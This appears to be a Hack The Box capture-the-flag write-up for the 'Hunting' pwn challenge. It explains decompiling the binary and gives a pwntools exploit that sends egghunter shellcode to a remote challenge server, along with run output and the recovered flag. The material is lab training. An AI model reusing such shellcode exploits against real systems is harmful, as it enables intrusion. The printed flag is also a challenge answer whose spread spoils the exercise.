Hunting
I've hidden the flag very carefully, you'll never manage to find it! Please note that the goal is to find the flag, and not to obtain a shell.decompiling the binary using Hex-Rays or any other decompilers like ninja,ghidra ...etc, used decompiler explorer to search through the decpmiled code easily
when i search for the flag in the code we find that the flag is hardcoded in the binary into the stack
The string "aHtbXxxxxxxxxxx" which holds the flag is copied into the mapped memory region dest using strcpy
to hunt the flag we are going to use egghunter shellcode which searches the memory for the byte sequence given as a parameter
Exploit :
from pwn import *
# io = process('./hunting')
io = remote('83.136.249.57', 30765)
# edi will point to the random memory are with the string HTB{
shellcode = asm(shellcraft.i386.linux.egghunter('HTB{'))
# execute write syscall to print the flag
shellcode += asm('''
xor eax, eax
xchg ecx, ebx
inc ebx
mov al, 0x4
int 0x80
''')
io.sendline(shellcode)
print(io.recvall())let's execute the exploit locally and remotely
┌──(kali㉿kali)-[~/hackthebox/pwn/pwn_hunting]
└─$ python exploit.py
[+] Starting local process './hunting': pid 96508
[+] Receiving all data: Done (1.00KB)
[*] Stopped process './hunting' (pid 96508)
b'HTB{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}\x00\x00\x00\x00\x00\x00\x00\...remotely
┌──(kali㉿kali)-[~/hackthebox/pwn/pwn_hunting]
└─$ python exploit.py
[+] Opening connection to 83.136.249.57 on port 30765: Done
[+] Receiving all data: Done (1.06KB)
[*] Closed connection to 83.136.249.57 port 30765
b'HTB{H0w_0n_34rth_d1d_y0u_f1nd_m3?!?}\x00\x00\x00\x00\x00\x00\Flag :
HTB{H0w_0n_34rth_d1d_y0u_f1nd_m3?!?}
Last updated
Was this helpful?